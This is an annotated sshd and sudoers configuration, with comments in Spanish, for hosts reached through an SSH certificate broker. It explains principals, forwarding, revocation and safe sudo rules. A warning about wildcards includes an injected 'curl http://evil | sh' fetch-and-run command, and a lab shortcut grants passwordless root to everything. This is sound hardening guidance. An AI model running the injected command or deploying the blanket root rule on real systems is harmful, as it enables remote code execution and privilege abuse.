# --- Configuración en cada host Linux gestionado ---
# Confía en la CA del grupo al que pertenece este host. Un cert emitido para
# otro grupo NO sirve aquí (aislamiento ante robo de una clave firmante).
TrustedUserCAKeys /etc/ssh/ca_<grupo>.pub

# Mapea el principal del certificado a las cuentas locales permitidas.
# El fichero debe listar, por cuenta, los principals aceptados.
AuthorizedPrincipalsFile /etc/ssh/auth_principals/%u
#
# ALTERNATIVA DINÁMICA: AuthorizedPrincipalsCommand
# OpenSSH ≥6.9 admite ejecutar un binario/script en cada autenticación y usar
# su stdout como lista de principals, en lugar del archivo estático.
#
#   AuthorizedPrincipalsCommand /usr/local/bin/ssh-principals-lookup %u %k
#   AuthorizedPrincipalsCommandUser nobody
#
# Tokens útiles: %u (usuario SSH), %k (clave pública), %t (tipo), %f (fingerprint).
#
# Con la arquitectura actual del broker NO merece la pena: cada host tiene un
# único principal fijo declarado en signer.json; el archivo estático es más
# simple, siempre disponible, y sin latencia extra en el path de autenticación.
#
# Tendría sentido en dos escenarios futuros:
#   1. Hosts dinámicos (allow_dynamic_hosts): si el modelo puede especificar
#      hosts no declarados en signer.json, el archivo estático es inviable.
#   2. Revocación por principal sin KRL: el comando puede consultar una lista
#      negra centralizada (p.ej. nuevo endpoint /v1/principals en el signer)
#      para denegar principals comprometidos sin tocar el sshd_config.

# Trazabilidad: registra serial e identidad (KeyId) de cada cert presentado,
# para correlar con el log de auditoría del broker.
LogLevel VERBOSE

# Endurecer la superficie. OJO con el forwarding según el rol del host:
#  - HOST DESTINO (hoja): mantener restringido.
#       AllowTcpForwarding no
#  - HOST BASTIÓN (usado como Jump por otros): debe permitir forwarding para
#    abrir el canal direct-tcpip al siguiente salto. El broker ya emite el cert
#    del bastión con la extensión permit-port-forwarding; aquí hay que permitirlo:
#       AllowTcpForwarding yes   # idealmente: local
X11Forwarding no
PermitTunnel no

# PTY: OpenSSH lo permite por defecto (PermitTTY yes). Si endureciste el sshd
# con PermitTTY no, reactívalo para los hosts que usen mode=pty o pty=true:
#   PermitTTY yes

# Ejemplo de /etc/ssh/auth_principals/deploy:
#   host:web01
#   host:web02
#
# Para revocación de emergencia de certs emitidos (por serial):
#   RevokedKeys /etc/ssh/krl
# y generar la KRL con:  ssh-keygen -k -f /etc/ssh/krl -s ca_<grupo>.pub <spec>


# --- Configuración de sudo (elevación NOPASSWD) ---
# El broker usa 'sudo -n' (no interactivo). Un comando SIMPLE (una sola orden,
# sin pipes/redirecciones/expansiones) se ejecuta como argv directo:
#     sudo -n -- systemctl restart nginx.service
# y uno con semántica de shell conserva el envoltorio:
#     sudo -n -- /bin/sh -c 'journalctl -u nginx | tail -n 50'
# sudoers compara los argumentos de la regla contra el argv que RECIBE sudo,
# unido por espacios (fnmatch). Ojo: el comando lo parsea antes la shell de
# login de la cuenta, que quita las comillas de cada palabra — la regla debe
# reflejar el argv ya sin comillas, no la cadena literal del force-command.
# La cuenta SSH (p. ej. 'deploy') necesita en /etc/sudoers.d/broker:
#
#   # Atajo de laboratorio: cualquier comando como root sin contraseña.
#   deploy ALL=(root) NOPASSWD: ALL
#
# Recomendado en producción: una línea por comando simple permitido, con el
# binario real y sus argumentos literales (espejo de command_policies):
#   deploy ALL=(root) NOPASSWD: /usr/bin/systemctl restart nginx.service
#   deploy ALL=(root) NOPASSWD: /usr/bin/journalctl -u nginx --since -1h
#
# Comandos con semántica de shell: la regla autoriza /bin/sh con el argumento
# envuelto. La forma de regex anclada (sudo >= 1.9.10) evita el campo de minas
# del escapado:
#   deploy ALL=(root) NOPASSWD: /bin/sh ^-c journalctl -u nginx \| tail -n 50$
# Alternativa con espacios escapados — escapar SOLO los espacios: '\|' es un
# ERROR DE SINTAXIS que invalida el fichero entero, el '|' va tal cual:
#   deploy ALL=(root) NOPASSWD: /bin/sh -c journalctl\ -u\ nginx\ |\ tail\ -n\ 50
#
# PELIGROS (todos verificados con visudo -c):
#  - Nunca comodines: fnmatch corre sin FNM_PATHNAME, '*' cruza espacios y ';'
#    ("sh -c *" equivale a NOPASSWD: ALL; "systemctl restart *" casa con
#    "...; curl http://evil | sh").
#  - Las comillas dobles NO agrupan en los argumentos de un Cmnd (solo en los
#    valores de Defaults): se comparan como bytes literales y la regla no casa.
#  - Un '#' sin escapar trunca la regla EN SILENCIO; ',' ':' '=' '\' sin
#    escapar invalidan el fichero entero.
#
# Para sudo a un usuario específico distinto de root (p. ej. 'appuser'):
#   deploy ALL=(appuser) NOPASSWD: ALL
#
# Verificar que una regla casa SIN ejecutar nada (como root):
#   sudo -l -U deploy -- /usr/bin/systemctl restart nginx.service
# Verificar la elevación end-to-end (como 'deploy'), con un comando que la
# regla permita — con el ejemplo restrictivo de arriba:
#   sudo -n -- systemctl restart nginx.service
